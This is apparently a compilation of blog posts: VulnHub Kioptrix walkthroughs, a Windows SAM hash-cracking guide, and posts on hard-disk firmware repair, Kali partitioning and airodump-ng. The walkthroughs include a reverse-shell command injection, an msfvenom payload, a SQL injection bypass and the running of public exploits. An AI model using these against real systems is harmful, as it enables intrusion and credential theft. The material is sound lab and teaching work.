Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   # on the attacking machine: serve the file

nc -nv 8888 > ./28718.c     # on the victim machine: connect back and receive it

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.


Kioptrix: Level 1.1 (#2) walkthrough

This is a walkthrough of the Kioptrix: Level 1.1 (#2) vulnhub machine. Original link here:,23/

The scan:

root@kali:~# nmap -sT -A -O -p-

Starting Nmap 7.50 ( ) at 2018-02-24 07:35 EST
Nmap scan report for
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 625/udp status
|_ 100024 1 628/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-02-24T10:26:27+00:00; -2h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
628/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:47:D4:2E (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop

First I tried exploiting port 631, which is the Linux printing service, CUPS, version 1.1.

Searching for the exploit:

root@kali:~/junk/kioptrix1.2# searchsploit cups 1.1
--------------------------------------------- ----------------------------------
 Exploit Title                                | Path
                                              | (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
CUPS 1.1.x - '.HPGL' File Processor Buffer O  | linux/remote/24977.txt
CUPS 1.1.x - Cupsd Request Method Denial of   | linux/dos/22619.txt
CUPS 1.1.x - Negative Length HTTP Header      | linux/remote/22106.txt
CUPS 1.1.x - UDP Packet Remote Denial of Ser  | linux/dos/24599.txt
CUPS Server 1.1 - GET Request Denial of Serv  | linux/dos/1196.c
--------------------------------------------- ----------------------------------

Generating the shell:

The exploit needs an .so payload, so I try it.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=8443 -f elf-so >>
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf-so file: 369 bytes

For some reason, the exploit fails. Moving along.

Port 80 is open and we have an authentication form. We try to bypass the authentication via SQL injection, and it works:

Authentication is bypassed.

We are presented with a ping form that should let us ping a network node.

We try command execution through it, with a netcat listener on port 777 of our attacking machine. The injected value is:

;bash -i >& /dev/tcp/ 0>&1

It works:
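The ping form is a textbook OS command injection: the host value is spliced into a shell command line, so a `;` starts a second command that runs with the web server's privileges. As an added example (not the machine's code and not from the walkthrough), the block below puts the vulnerable construction next to a hardened one that accepts only a literal IP address or a syntactically valid hostname and hands it to ping as a single argv element, with no shell in between. The hostname grammar is my own approximation of RFC 1123 labels.

```python
import ipaddress
import re
import subprocess

# Hostname grammar: labels of letters, digits and hyphens, 63 chars per label, 253 total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def build_ping_command_unsafe(target):
    """Vulnerable pattern: the form value is spliced into a shell command line.
    Anything after ';' (or inside $( )) is executed by the shell as well."""
    return "ping -c 1 " + target


def validate_target(target):
    """Accept only a literal IP address or a syntactically valid hostname."""
    target = target.strip()
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"not a valid host: {target!r}")


def is_safe_target(target):
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_argv_safe(target):
    """Hardened form: the validated value is one argv element, so the shell never sees it
    and nothing in it can start a second command or be parsed as an option."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping_safe(target, timeout=10):
    """Execute the hardened form without a shell (shell=False is subprocess's default)."""
    return subprocess.run(build_ping_argv_safe(target), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    injected = "127.0.0.1;echo INJECTED"
    print("unsafe command line:", build_ping_command_unsafe(injected))
    # Handed to a shell, that string runs 'echo INJECTED' after ping; the safe path rejects it.
    for value in ("10.0.0.5", "derpnstink.local", injected, "$(id)", "-f"):
        print(f"{value!r}: {'accepted' if is_safe_target(value) else 'rejected'}")
```

Validation with an allow-list grammar plus argv-style execution is the combination that matters; escaping alone is fragile, and `subprocess.run` with a list never invokes `/bin/sh`, so even a value that slipped through the check would reach ping as one argument rather than as shell syntax.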

To escalate privileges we try the unix-privesc-script, but with no success.

Eventually I got it with a kernel exploit.

curl -k -o 9542.c

Compile it:

bash-3.00$ gcc -o 0x82-CVE-2009-2698 ./9542.c
./9542.c:109:28: warning: no newline at end of file

Run it:

Kioptrix level1.1 walkthrough

This is the Kioptrix vulnerable machine walkthrough.

You can download it from,22/

The scan:

root@kali:~# nmap -sT -sV -p-

Starting Nmap 7.50 ( ) at 2018-02-17 17:00 EST
Nmap scan report for
Host is up (0.00014s latency).
Not shown: 65529 closed ports
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E2:87:5A (VMware)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 18.92 seconds

We will search for vulnerabilities for mod_ssl/2.8.4.


root@kali:~/junk# searchsploit 764.c
----------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                  | Path
                                                                                                | (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------------------------------- ----------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit                                  | unix/remote/764.c
Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)   | windows/local/40764.cs
Symantec AntiVirus - IOCTL Kernel Privilege Escalation (2)                                      | windows/local/28764.c
TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking                                    | windows/local/14764.c
----------------------------------------------------------------------------------------------- ----------------------------------

We will try the first result.

Downloading the exploit in C format:


Install the prerequisites:

apt-get install libssl-dev libssl1.0-dev

Edit the C file.

nano 764.c

Add the following two lines in the SSL include area:

#include <openssl/rc4.h>
#include <openssl/md5.h>

Search for wget (Ctrl+W in nano) and replace the URL with this new one:

Compile the exploit:

sudo gcc -o OpenFucka ./764.c -lcrypto

Run the exploit:

root@kali:~/junk# ./OpenFucka 0x6b 443 -c 50

If everything works, you should get your root shell:

Crack the Windows SAM file from a backup filesystem

The SAM file is located in C:\Windows\System32\config and stores the passwords of all local Windows accounts in encrypted form.

The problem is that you cannot copy or tamper with the file while the file system is mounted.

This leaves us with at least two options: copy the SAM and SYSTEM files from a Linux live CD, or use a copy of those files from a backup.

I have the backup and I copy the 2 files to my Kali Linux machine.

I recover the NTLM hashes by issuing the following command:

root@kali:~# /usr/bin/samdump2 /root/Desktop/SYSTEM /root/Desktop/SAM

The backup is from a Windows 7 installation, which means we are seeing NTLM v.2 hashes, so only the last part of each hash is useful.

So we need to convert that last part to uppercase with two BASH commands:

cristi@ubserver-nv:~/hashcat$ STRING='f9a14effe4a24ceb1cf0b2e8e9e7e9f9'
cristi@ubserver-nv:~/hashcat$ echo $STRING | awk '{print toupper($0)}'

Copy the uppercase version to a text file and start hashcat:

crs@ubsv:~$ ./hashcat -m 1000 -a 3 ./ntlm.txt -w 3 --status
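The steps above (dump, take the NT part of each hash, uppercase it, feed it to hashcat -m 1000) are collected here as an added example in the form of a small parser; it is my own code, not samdump2's or hashcat's. samdump2 prints one user:RID:LMhash:NThash::: line per account. The block parses that format, skips accounts whose NT hash is the well-known empty-password value (so no time is spent on blank or disabled accounts), reports any account that still carries a real LM hash (a much weaker format that should not exist on a Windows 7 system), and writes the uppercase NT hashes as hashcat input. The sample dump is constructed: the account names and RIDs are invented, and only the last hash is the one quoted in the post.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed samdump2-style output (user:rid:lmhash:nthash:::). Account names and RIDs are
# made up; the last NT hash is the one quoted in the post.
SAMPLE_SAMDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
localuser:1000:aad3b435b51404eeaad3b435b51404ee:f9a14effe4a24ceb1cf0b2e8e9e7e9f9:::
"""

LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")


def parse_samdump(text):
    """Return one dict per account: user, rid (int), lm, nt (hex strings as printed)."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            records.append(rec)
    return records


def empty_password_accounts(records):
    """Accounts whose NT hash is that of the empty password (blank or disabled)."""
    return [r["user"] for r in records if r["nt"].lower() == EMPTY_NT]


def lm_hash_accounts(records):
    """Accounts that still store an LM hash; these deserve a finding of their own."""
    return [r["user"] for r in records if r["lm"].lower() != EMPTY_LM]


def hashcat_ntlm_lines(records):
    """One uppercase NT hash per line for `hashcat -m 1000`, skipping empty-password accounts."""
    return [r["nt"].upper() for r in records if r["nt"].lower() != EMPTY_NT]


def write_hashcat_file(records, path):
    """Write the hashcat input file; returns the number of hashes written."""
    lines = hashcat_ntlm_lines(records)
    with open(path, "w") as fh:
        fh.write("\n".join(lines) + "\n")
    return len(lines)


if __name__ == "__main__":
    recs = parse_samdump(SAMPLE_SAMDUMP)
    print("empty-password accounts:", empty_password_accounts(recs))
    print("accounts with LM hashes:", lm_hash_accounts(recs))
    print("written:", write_hashcat_file(recs, "ntlm.txt"))
```

hashcat also accepts the lowercase form, so the uppercase step is convention rather than necessity; NT hashes are unsalted MD4, which is why the mask attack (-a 3) in the post runs so fast. The defensive reading is that SAM and SYSTEM hives inside backups deserve the same access controls as the live machine.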

Good luck!

Fix bricked Seagate ST31000340AS hard disk. BSY error

9 years ago I had this 1TB Seagate ST31000340AS hard disk that I was using as the primary drive for my OS and also as the place to store all my photos, video clips and other important stuff.
At some point it simply failed to work. No strange sounds, nothing. The BIOS would not recognize it and the OS would not see it.

I left it like that for 6-7 years, but in the last week I started informing myself about how to fix it.
I knew there wasn't any mechanical issue with it and I suspected HDD firmware issues.

And my suspicion was right. There was a known glitch with multiple series of Seagate models, more specifically with their SD15 firmware.
Now the fun begins, because there is a solution to this issue.

The materials needed to fix:
1. bricked Seagate HDD

2. Torx T6 screwdriver


3. USB to UART Prolific PL2303HX converter cable ($3). Link to Amazon

Also found as "PL2303HX USB to UART TTL Cable Module 4p 4 pin RS232 Converter".


4. A post-it or a piece of paper, folded 2-3 times, or any other slim, non-conductive material.

5. Prolific PL2303HX drivers that actually work on Windows 10 (get them from here, not from the manufacturer's website).

6. (optional) External HDD rack or connect the HDD directly to your motherboard via SATA and Molex ATX power cable.


Before we start, please be aware that there is a slight possibility that you will lose your data or break your HDD if you are not careful.

If you have important data that you cannot afford to lose, please go to a data recovery company to fix your hard drive.


Start the fixing process:

  • Power off your PC or your external USB hard disk rack.
  • Important: make sure that the SATA or USB cable is disconnected from your PC/external HDD rack.
  • Remove any jumpers from the HDD. If you have any.
  • Take the Torx T6 screw driver and remove all 6 screws and detach the HDD PCB. Remember that the long screws are always connected on the corners of the HDD.
  • Place the folded postit between the PCB and the contacts for the drive head.  Leave the drive motor contacts in place.  Tighten the three screws closest to the motor contacts.  Leave the other three screws loose or removed.


HDD drive head


  • Install the USB adapter’s drivers (from the link provided at the beginning of the post) and make sure that Windows sees it as COM port in Device manager and you don’t have any yellow errors on it. Reboot if necessary.
  • Connect the USB adapter to the PC.
  • Go to Device Manager, right-click the newly installed USB/COM adapter, choose Properties and make the following settings:
  • Choose 38400, 8, None, 1, None in the COM properties box.

You will need to connect 3 wires from the USB adapter to the HDD. The 4th is not used:

  • GREEN cable is RX on the USB -> connects to TX on HDD
  • WHITE cable is TX on the USB cable -> connects to RX on HDD
  • BLACK cable is the ground -> connects to the ground pin on HDD
  • You should connect the TX pin of the hard drive to the RX pin of the adapter, and the hard drive's RX pin to the adapter's TX pin. That is the theory; in real life it worked the other way around for me.
  • Connect the 3 pins like this:


These pins are located next to the hard drive’s SATA connector.

If you can’t fit the pins on the HDD, strip the plastic shielding from the pins.


  • After inserting the pins, power on the PC or the external USB rack. The SATA cable should be disconnected from the HDD. Same for the external rack.


RX, TX and ground pins connected to the hdd


  • Download putty from their official site.
  • Open putty and make these settings. Make sure you are using the correct COM port number. Mine was COM8, but it might be different for you. Go to device manager to check the actual port number.
    • Baud 38400 
    • Data Bits 8 
    • Stop Bits  1 
    • Parity none 
    • Flow Control  none


  • Hit save and open.
  • You should see a blank screen. Hit Ctrl+Z.
  • If you connected the pins correctly you should see a prompt like this:

 F3 T>

If not, you may have the TX and RX wires swapped. Switch the green wire with the white one and try again.

Go to Access Level 2 (type /2):

F3 T>/2 (enter)
F3 2>

Wait about 30 seconds, then spin down the motor:

F3 2>Z (enter)

  Spin Down Complete
    Elapsed Time 0.147 msecs
F3 2>

If you instead see a message similar to this:

LED: 000000CE  FAddr: 00280D4D

Then you entered the commands too quickly after supplying power to the drive.

Power off the HDD, wait 30 seconds, then begin again.
If everything went smoothly up to this point, carefully remove the red post-it that you placed between the PCB and the drive head contacts.

Tighten all the screws. Then start the motor:

F3 2>U (enter)

Spin Up Complete
    Elapsed Time 7.093 secs
F3 2>

Next go to Level 1 (type /1):

F3 2>/1 (enter)

And do a S.M.A.R.T. erase (create S.M.A.R.T. sector):

F3 1>N1 (enter)

When the prompt comes back, turn off power to the hard drive, wait a few seconds, then turn it back on. Wait about 20 seconds (press Ctrl+Z again if no prompt appears), then finally do the partition regeneration:

Note: the command below contains a zero (m0), not the letter o.

F3 T>m0,2,2,0,0,0,0,22 (enter)

After 15-30 seconds, you should see something like:

Max Wr Retries = 00, Max Rd Retries = 00, Max ECC T-Level = 14, Max Certify Rewrite Retries = 00C8

    User Partition Format 10% complete, Zone 00, Pass 00, LBA 00004339, ErrCode 00000080, Elapsed Time 0 mins 05 secs

    User Partition Format Successful – Elapsed Time 0 mins 05 secs

Do not turn off the drive until you see this message.
Once you see it, the drive can be turned off.
Power down everything, put the drive back into your computer, and confirm that it is working.

Update the firmware to the latest version! Google is your friend.
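The same command sequence can be driven from a script instead of typed into PuTTY, which makes the 30-second waits and the LED/FAddr check harder to get wrong. The following is an added example and not part of the original post: it talks to the F3 terminal over pyserial (assumed installed; open_port, the three stage functions and the FakePort dry-run class are my own names), sends each command, waits for the next F3 prompt and aborts on the LED/FAddr error line. The hands-on steps (removing the insulator, screwing the PCB back on, power-cycling the drive) stay manual: run one stage, do the hands-on part, run the next.

```python
import re
import time

# Prompts look like "F3 T>", "F3 1>", "F3 2>": "F3 " plus the current level.
PROMPT_RE = re.compile(rb"F3 [T0-9]>\s*$")
# "LED: 000000CE  FAddr: 00280D4D" style output means the drive was not ready yet.
ERROR_RE = re.compile(rb"LED:\s*[0-9A-Fa-f]+\s+FAddr:\s*[0-9A-Fa-f]+")


class F3Error(RuntimeError):
    """The terminal answered with an error line instead of a prompt."""


def open_port(device, baud=38400):
    """Real transport: pyserial (assumed installed), 8N1, no flow control, 1 s read timeout."""
    import serial  # imported lazily so everything else works without pyserial
    return serial.Serial(device, baudrate=baud, bytesize=8, parity="N", stopbits=1, timeout=1)


def read_until_prompt(port, timeout=60.0, sleep=time.sleep):
    """Collect output until an F3 prompt ends the buffer; raise F3Error on LED/FAddr lines."""
    buf = b""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        chunk = port.read(256)
        if not chunk:
            sleep(0.05)
            continue
        buf += chunk
        if ERROR_RE.search(buf):
            raise F3Error(buf.decode("ascii", "replace").strip())
        if PROMPT_RE.search(buf):
            return buf
    raise TimeoutError("no F3 prompt within %.0f s, got %r" % (timeout, buf))


def send(port, cmd, expect=None, timeout=60.0, sleep=time.sleep):
    """Send one CR-terminated command, wait for the next prompt, optionally check the reply."""
    port.write(cmd + b"\r")
    out = read_until_prompt(port, timeout, sleep)
    if expect is not None and expect not in out:
        raise F3Error("expected %r after %r, got %r" % (expect, cmd, out))
    return out


def wake(port, sleep=time.sleep):
    """Ctrl+Z; a prompt within a few seconds proves TX/RX are wired the right way round."""
    port.write(b"\x1a")
    return read_until_prompt(port, timeout=5, sleep=sleep)


def spin_down(port, sleep=time.sleep):
    """Stage 1: /2, let the drive settle for 30 s, then Z. Stop here to remove the insulator."""
    wake(port, sleep)
    send(port, b"/2", sleep=sleep)
    sleep(30)  # commands sent too soon after power-on produce the LED/FAddr error
    return send(port, b"Z", expect=b"Spin Down Complete", sleep=sleep)


def spin_up_and_smart_erase(port, sleep=time.sleep):
    """Stage 2 (PCB screwed back on): U, then N1 at level 1. Power-cycle the drive by hand afterwards."""
    send(port, b"U", expect=b"Spin Up Complete", sleep=sleep)
    send(port, b"/1", sleep=sleep)
    return send(port, b"N1", sleep=sleep)


def regenerate_partition(port, sleep=time.sleep):
    """Stage 3 (after the power cycle): m0,... at level T and wait for the format to finish."""
    sleep(20)
    wake(port, sleep)
    return send(port, b"m0,2,2,0,0,0,0,22", expect=b"User Partition Format Successful",
                timeout=300, sleep=sleep)


class FakePort:
    """Constructed stand-in for serial.Serial used for dry runs: replays canned replies."""

    def __init__(self, replies):
        self.replies = replies   # bytes written -> bytes the "drive" answers with
        self.sent = []
        self.pending = b""

    def write(self, data):
        self.sent.append(data)
        self.pending += self.replies.get(data, b"\r\nF3 T>")

    def read(self, n):
        out, self.pending = self.pending[:n], self.pending[n:]
        return out
```

For a real drive, spin_down(open_port("COM8")) on Windows or open_port("/dev/ttyUSB0") on Linux runs the first stage; FakePort replays canned replies so the whole flow can be rehearsed without a drive attached, and the LED/FAddr case shows up as an F3Error instead of a silently wrong prompt.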

You are welcome 🙂

Fixing Plesk Postfix sending emails locally

I had this issue too. Any email being sent to my company domain was being sent locally. This is (I believe) because in Plesk (yes it’s a Plesk issue).

So basically it’s going “oh, is the registered user, let’s send any emails locally” or something like that.

Anyway, I have had to fix this twice now and I did it by editing the /etc/postfix/ file and commenting out the lines that started with “virtual”. Back up the file before editing it, and run postfix reload afterwards so the new configuration is picked up.

How to increase the Kali Linux root partition

If you need to increase the Kali Linux root partition size, this becomes awkward when an extended partition (holding swap) sits right after the root partition, because the root filesystem cannot grow past it.
First things first. If you are using VMware, edit the settings of the Kali virtual machine and expand the hard disk.
Power on the Kali virtual machine.

My problem:
/dev/sda1 30GB mounted on /
/dev/sda2 5GB extended partition containing the logical partition /dev/sda5, used as swap

What I want to do is delete the SWAP partition, mark the space as unused and increase the / partition size and leave a couple of GB free to create another SWAP partition.

Using gparted will not work, because it will tell you that the (swap) partition is in use.
Commenting out the swap partition in /etc/fstab will also not work. I also tried swapoff --all with the same result.

The fix:
root@kali:~# fdisk /dev/sda
Use p to print the current partition table.
Use d to delete partition 5 (the swap logical partition), then d again to delete partition 2 (the extended container that held it).
Use w to write the changes and reboot.

Use lsblk to confirm that the swap partition is gone (df -h does not list swap), or gparted if you want a GUI.

Resize the root partition by deleting it and recreating it with the same start sector. Only the partition table entry changes; the filesystem data stays where it is, which is why the start sector must not move. Newer fdisk versions ask whether to remove the existing ext4 signature when you recreate the partition: answer No, otherwise the superblock is wiped.

root@kali:~# fdisk /dev/sda

Command (m for help): p
Disk /dev/sda: 300 GiB, 322122547200 bytes, 629145600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xaaea4a6f

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 60262399 60260352 28.8G 83 Linux

Command (m for help): d //deletes the partition
Selected partition 1
Partition 1 has been deleted.

// recreate the partition at the same start sector (2048), then increase its size
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 1
First sector (2048-629145599, default 2048): 2048
Last sector, +sectors or +size{K,M,G,T,P} (2048-629145599, default 629145599): +290G //extend the / partition to 290G

Created a new partition 1 of type ‘Linux’ and of size 290 GiB.

Command (m for help): a //mark the partition as bootable
Selected partition 1
The bootable flag on partition 1 is enabled now.

Command (m for help): p
Disk /dev/sda: 300 GiB, 322122547200 bytes, 629145600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xaaea4a6f

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 608176127 608174080 290G 83 Linux

Command (m for help): w //write the changes
The partition table has been altered.
Calling ioctl() to re-read partition table.
Re-reading the partition table failed.: Device or resource busy

The kernel still uses the old table. The new table will be used at the next reboot or after you run partprobe(8) or kpartx(8).

root@kali:~# reboot

After the reboot, issue the following command:

root@kali:~# resize2fs /dev/sda1
resize2fs 1.42.13 (17-May-2015)
Filesystem at /dev/sda1 is mounted on /; on-line resizing required
old_desc_blocks = 2, new_desc_blocks = 19
The filesystem on /dev/sda1 is now 76021760 (4k) blocks long.

Check with df -h that the root filesystem now has the new size.

root@kali:~# df -h
Filesystem Size Used Avail Use% Mounted on
udev 10M 0 10M 0% /dev
tmpfs 529M 7.9M 521M 2% /run
/dev/sda1 286G 9.5G 264G 4% /
tmpfs 1.3G 320K 1.3G 1% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 1.3G 0 1.3G 0% /sys/fs/cgroup
tmpfs 265M 8.0K 265M 1% /run/user/133
tmpfs 265M 16K 265M 1% /run/user/0
tmpfs 1.3G 4.0K 1.3G 1% /var/lib/polkit-1/localauthority/90-mandatory.d

To create a new swap partition, use gparted (or fdisk followed by mkswap) in the free space at the end of the disk, then enable it with swapon and update the swap entry in /etc/fstab, because the new partition has a new UUID.
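The arithmetic behind the fdisk session above is worth checking before pressing w, because the one thing that must not change is the start sector. The following is an added example (my own code, not part of the original post): it parses the backup you should take first with sfdisk -d /dev/sda, plans the grown root partition, and computes the end sector and the 4k block count resize2fs should report. The dump text is constructed to match the layout described on this page and the function names are my own.

```python
import re

SECTOR = 512
GIB = 1024 ** 3

# One partition line of an `sfdisk -d` dump, e.g.
#   /dev/sda1 : start=        2048, size=    60260352, type=83, bootable
PART_RE = re.compile(
    r"^(?P<dev>/dev/\S+)\s*:\s*start=\s*(?P<start>\d+),\s*size=\s*(?P<size>\d+),"
    r"\s*type=(?P<type>[0-9A-Za-z]+)(?P<boot>,\s*bootable)?"
)


def parse_sfdisk_dump(text):
    """Turn `sfdisk -d /dev/sdX` output into a list of partition dicts (units: sectors)."""
    parts = []
    for line in text.splitlines():
        m = PART_RE.match(line.strip())
        if m:
            parts.append({"dev": m["dev"], "start": int(m["start"]), "size": int(m["size"]),
                          "type": m["type"], "bootable": bool(m["boot"])})
    return parts


def gib_to_sectors(gib):
    return int(gib * GIB) // SECTOR


def plan_root_resize(parts, disk_sectors, root_dev, new_size_gib, swap_gib):
    """Drop everything but the root partition, grow it in place, keep room for swap.

    The invariant that matters for data safety: the new start sector equals the
    old one. Move it and the filesystem superblock is no longer where the kernel
    expects it."""
    root = next(p for p in parts if p["dev"] == root_dev)
    others = [p for p in parts if p["dev"] != root_dev]
    if any(p["start"] < root["start"] for p in others):
        raise ValueError("a partition sits before %s; cannot grow it in place" % root_dev)
    new_size = gib_to_sectors(new_size_gib)
    if new_size <= root["size"]:
        raise ValueError("new size must exceed the current %d sectors" % root["size"])
    free_start = root["start"] + new_size
    if disk_sectors - free_start < gib_to_sectors(swap_gib):
        raise ValueError("not enough space left for %s GiB of swap" % swap_gib)
    new_root = dict(root, size=new_size)   # start, type and bootable flag unchanged
    return new_root, (free_start, disk_sectors - 1)


def ext4_blocks(part, block_size=4096):
    """Block count resize2fs should report once the filesystem fills the partition."""
    return part["size"] * SECTOR // block_size


def sfdisk_line(part):
    """Render one partition back into sfdisk dump syntax (can be fed to `sfdisk /dev/sdX`)."""
    flag = ", bootable" if part["bootable"] else ""
    return "%s : start=%d, size=%d, type=%s%s" % (
        part["dev"], part["start"], part["size"], part["type"], flag)


# Constructed dump in the shape of the layout on this page (root + extended + swap); not real output.
EXAMPLE_DUMP = """\
label: dos
label-id: 0xaaea4a6f
device: /dev/sda
unit: sectors

/dev/sda1 : start=        2048, size=    60260352, type=83, bootable
/dev/sda2 : start=    60262400, size=    10485760, type=5
/dev/sda5 : start=    60264448, size=    10483712, type=82
"""

if __name__ == "__main__":
    parts = parse_sfdisk_dump(EXAMPLE_DUMP)
    root, free = plan_root_resize(parts, 629145600, "/dev/sda1", 290, 8)
    print(sfdisk_line(root))
    print("free for swap: sectors %d-%d; resize2fs should report %d 4k blocks"
          % (free[0], free[1], ext4_blocks(root)))
```

For the 300 GiB disk above it returns start=2048, size=608174080, i.e. end sector 608176127 and 76021760 4k blocks, exactly the numbers fdisk and resize2fs printed, and leaves sectors 608176128-629145599 (about 10 GiB) free for swap. The sfdisk_line output can be written back with sfdisk /dev/sda from a rescue system, which avoids the interactive session entirely.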


How to run airodump-ng in background

airodump-ng is part of the aircrack-ng suite and is responsible for capturing raw 802.11 (WLAN) frames.
At some point you will need to run airodump-ng in the background, which is kind of tricky, but I’ll show you how it’s done properly.

To be able to use airodump-ng you will need a WLAN card whose driver supports monitor mode.

Monitor mode lets a wireless network interface controller (WNIC) pass every 802.11 frame it hears on the channel up to the host, not only frames addressed to it, without associating to an access point.

Enable monitor mode (airmon-ng start wlan0 does the same and creates wlan0mon; run airmon-ng check kill first if NetworkManager or wpa_supplicant keeps putting the card back into managed mode):

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Standard usage of airodump-ng:

airodump-ng wlan0 // channel hopping (monitors all channels by hopping from one to another)
airodump-ng -c 6 wlan0 // monitors channel 6
airodump-ng -c 6 wlan0 -w capture // monitors channel 6 and writes the captured frames to capture-01.cap (airodump-ng appends a sequence number and also writes .csv, .kismet.csv and .kismet.netxml files next to it)

In Linux, the easiest way to run programs in the background is to append “&” to the command:

my_command -options &

This, however, does not work well with airodump-ng: it keeps redrawing its status screen on the terminal, and the job is killed by SIGHUP when that terminal closes. After some trial and error, the most stable way to run airodump-ng in the background is to put the commands in a script file and run the script with:

nohup ./ &

The script:

#!/bin/bash
# run airodump-ng in the background in a stable way
airodump-ng -w capture wlan1 &

The problem with using nohup this way is that it generates a huge ./nohup.out file (nohup only creates it when stdout is a terminal, so redirecting the script’s output to /dev/null avoids the file altogether).
If you keep the plain nohup invocation, add a cron entry that clears ./nohup.out every minute:

crontab -e

And add the following line:

* * * * * > /path/to/nohup.out

The nohup file will be generated in the directory from where you started the airodump script.
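Rather than nohup plus a cron job that truncates nohup.out, the two root causes (output going to the terminal, and SIGHUP when the terminal goes away) can be handled directly. The following is an added example, not from the original post: a small Python launcher that builds the airodump-ng command line, starts it in its own session with stdin/stdout/stderr pointed at /dev/null, and stops it with SIGTERM so the capture files are closed cleanly. The function names, the pidfile path and the wlan0mon interface name are my own assumptions.

```python
import os
import subprocess


def build_airodump_cmd(iface, prefix, channel=None, bssid=None, write_interval=None):
    """argv for airodump-ng: pcap+csv output only, optional channel/BSSID lock."""
    cmd = ["airodump-ng", "-w", prefix, "--output-format", "pcap,csv"]
    if channel is not None:
        cmd += ["-c", str(channel)]
    if bssid is not None:
        cmd += ["--bssid", bssid]
    if write_interval is not None:
        cmd += ["--write-interval", str(write_interval)]  # seconds between file flushes
    cmd.append(iface)
    return cmd


def launch_detached(cmd, pidfile=None):
    """Start cmd in its own session with all stdio pointed at /dev/null.

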